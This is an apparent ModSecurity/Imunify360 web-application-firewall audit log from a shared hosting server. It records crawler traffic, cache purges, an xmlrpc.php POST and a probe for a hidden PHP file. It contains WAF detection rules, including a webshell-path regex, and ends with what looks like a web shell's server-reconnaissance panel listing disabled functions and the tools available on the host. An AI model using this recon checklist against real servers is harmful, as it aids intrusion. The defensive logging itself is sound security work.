--f2b45e72-B-- GET / HTTP/1.1 Host: www.direct-leadz.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --f2b45e72-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/7.4.33 X-Redirect-By: WordPress -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366872539168 41996 (- - -) Stopwatch2: 1751366872539168 41996; combined=1642, p1=91, p2=1393, p3=0, p4=0, p5=157, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bcd0481e-Z-- --0a3ef32e-A-- [01/Jul/2025:16:17:53.198397 +0530] aGO81ktSp2OH4H2d_eHgkQAAABs 103.185.74.40 57635 192.168.74.40 443 --0a3ef32e-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --0a3ef32e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0a3ef32e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366870592296 2606441 (- - -) Stopwatch2: 1751366870592296 2606441; combined=2269, p1=86, p2=2003, p3=0, p4=0, p5=179, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0a3ef32e-Z-- --172ceb3a-A-- [01/Jul/2025:16:17:53.227017 +0530] aGO82UrSSSG5LnhUxKLOiwAAAAY 162.158.49.2 49512 192.168.74.40 443 --172ceb3a-B-- GET /wp-includes/images/about.php HTTP/1.1 Host: mail.metalindustries.net.in X-Real-IP: 52.169.49.249 X-Remote-IP: 162.158.49.2 x-forwarded-for: 52.169.49.249 cf-ray: 958553ecd9acbde6-DUB x-forwarded-proto: https accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 cf-connecting-ip: 52.169.49.249 cf-ipcountry: IE cf-visitor: {"scheme":"https"} --172ceb3a-F-- HTTP/1.1 500 Internal Server Error -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f51bb641-Z-- --da811d6b-A-- [01/Jul/2025:16:31:07.993145 +0530] aGO_87iu8Ctm-L1ehvXssQAAACk 43.167.232.38 42792 192.168.74.40 80 --da811d6b-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --da811d6b-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --da811d6b-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751367667986283 7375 (- - -) Stopwatch2: 1751367667986283 7375; combined=4448, p1=106, p2=4054, p3=102, p4=3, p5=183, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --da811d6b-Z-- --97424c30-A-- [01/Jul/2025:16:31:08.767447 +0530] aGO_9OOoUsizXiPWPOxA8gAAACc 20.171.207.232 52052 192.168.74.40 443 --97424c30-B-- GET /https/js/rajasthan-tours-from-udaipur/images/aainag/https/Rajasthan-Travel-Guides/hotels-bharatpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --97424c30-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --97424c30-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/js/rajasthan-tours-from-udaipur/images/aainag/https/Rajasthan-Travel-Guides/hotels-bharatpur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370352869493 7398 (- - -) Stopwatch2: 1751370352869493 7398; combined=4146, p1=112, p2=3828, p3=81, p4=2, p5=122, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2afb1404-Z-- --bddf617b-A-- [01/Jul/2025:17:15:52.912913 +0530] aGPKboBbBh8xonO0WluYLAAAAEw 103.185.74.40 15538 192.168.74.40 443 --bddf617b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --bddf617b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --bddf617b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370350206707 2706722 (- - -) Stopwatch2: 1751370350206707 2706722; combined=3256, p1=118, p2=2958, p3=0, p4=0, p5=179, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bddf617b-Z-- --0d19d407-A-- [01/Jul/2025:17:15:53.199603 +0530] aGPKceYik73wHoe5IiM-vAAAAD8 20.171.207.232 34248 192.168.74.40 443 --0d19d407-B-- GET /https/js/rajasthan-tours-from-udaipur/images/aainag/https/aainag/Rajasthan-Travel-Guides/https/Car-Rentals-Jaisalmer.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --0d19d407-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0d19d407-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370354350202 19152 (- - -) Stopwatch2: 1751370354350202 19152; combined=3595, p1=159, p2=3190, p3=0, p4=0, p5=182, sr=59, sw=0, l=0, gc=64 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5e79f96a-Z-- --6de1af0f-A-- [01/Jul/2025:17:15:55.434024 +0530] aGPKcbObF00q5bHw3UFktQAAAD0 103.185.74.40 48566 192.168.74.40 443 --6de1af0f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --6de1af0f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6de1af0f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370353127183 2307429 (- - -) Stopwatch2: 1751370353127183 2307429; combined=3359, p1=122, p2=3088, p3=0, p4=0, p5=149, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6de1af0f-Z-- --885e0f5b-A-- [01/Jul/2025:17:15:55.493766 +0530] aGPKc-Yik73wHoe5IiM-vgAAAD8 20.171.207.232 34248 192.168.74.40 443 --885e0f5b-B-- GET /https/js/rajasthan-tours-from-udaipur/images/aainag/https/images/images/Rajasthan-Travel-Guides/Car-Rentals-Jaisalmer.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --885e0f5b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Stopwatch: 1751370903086568 6808 (- - -) Stopwatch2: 1751370903086568 6808; combined=4113, p1=122, p2=3773, p3=87, p4=2, p5=128, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --dff57532-Z-- --46817e5c-A-- [01/Jul/2025:17:25:03.147462 +0530] aGPMk-_YqMFDEtUo0GAmqQAAAEM 103.185.74.40 52372 192.168.74.40 443 --46817e5c-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --46817e5c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --46817e5c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370899724822 3423266 (- - -) Stopwatch2: 1751370899724822 3423266; combined=3538, p1=126, p2=3253, p3=0, p4=0, p5=158, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --46817e5c-Z-- --6b57b74f-A-- [01/Jul/2025:17:25:03.576331 +0530] aGPMlmwJ_aQ0hbV9cecSIwAAAD0 84.17.49.3 6582 192.168.74.40 443 --6b57b74f-B-- POST /contact.html HTTP/1.0 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0 Referer: https://n-pillarsconstruction.com/contact.html Content-Type: application/x-www-form-urlencoded Host: n-pillarsconstruction.com Content-Length: 1046 Connection: close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370904334464 17115 (- - -) Stopwatch2: 1751370904334464 17115; combined=3258, p1=201, p2=2871, p3=0, p4=0, p5=186, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --78566018-Z-- --128a240a-A-- [01/Jul/2025:17:25:05.342523 +0530] aGPMl6kAVM45AaS5iCEktAAAACA 103.185.74.40 35191 192.168.74.40 443 --128a240a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --128a240a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --128a240a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370903360662 1982536 (- - -) Stopwatch2: 1751370903360662 1982536; combined=2237, p1=89, p2=2000, p3=0, p4=0, p5=148, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --128a240a-Z-- --c3e17a6b-A-- [01/Jul/2025:17:25:05.603986 +0530] aGPMmd_4OFIsSrSdm2HukQAAAAM 57.141.0.20 49454 192.168.74.40 443 --c3e17a6b-B-- GET /rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-udaipur/rajasthan-tours-from-udaipur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/images/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/hotels-pushkar.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --c3e17a6b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370905586998 17271 (- - -) Stopwatch2: 1751370905586998 17271; combined=4180, p1=191, p2=3834, p3=0, p4=0, p5=155, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c3e17a6b-Z-- --20b0a702-A-- [01/Jul/2025:17:25:06.325876 +0530] aGPMmM9hXnEoHqdOc_WSVwAAACs 103.185.74.40 2997 192.168.74.40 443 --20b0a702-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --20b0a702-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --20b0a702-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370904949645 1376871 (- - -) Stopwatch2: 1751370904949645 1376871; combined=2105, p1=100, p2=1893, p3=0, p4=0, p5=112, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --20b0a702-Z-- --b9a71c31-A-- [01/Jul/2025:17:25:06.697454 +0530] aGPMmrKysGa6H_6VFYrFtgAAAA0 20.171.207.232 59346 192.168.74.40 443 --b9a71c31-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-jodhpur/images/aainag/Rajasthan-Travel-Guides/hotels-jaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b9a71c31-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370906676360 22551 (- - -) Stopwatch2: 1751370906676360 22551; combined=5231, p1=227, p2=4812, p3=0, p4=0, p5=191, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b9a71c31-Z-- --8d0e441b-A-- [01/Jul/2025:17:25:07.664433 +0530] aGPMmo2CCPnviuEK39SVPQAAABg 103.185.74.40 8851 192.168.74.40 443 --8d0e441b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --8d0e441b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8d0e441b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751370906534074 1130584 (- - -) Stopwatch2: 1751370906534074 1130584; combined=2150, p1=90, p2=1894, p3=0, p4=0, p5=166, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8d0e441b-Z-- --e6041736-A-- [01/Jul/2025:17:25:08.836707 +0530] aGPMme_YqMFDEtUo0GAmqgAAAEM 45.134.226.158 48966 192.168.74.40 443 --e6041736-B-- POST /xmlrpc.php HTTP/1.1 Host: www.sudershanmachinery.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0 Content-Length: 482 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip Connection: close --e6041736-C--
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.89 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A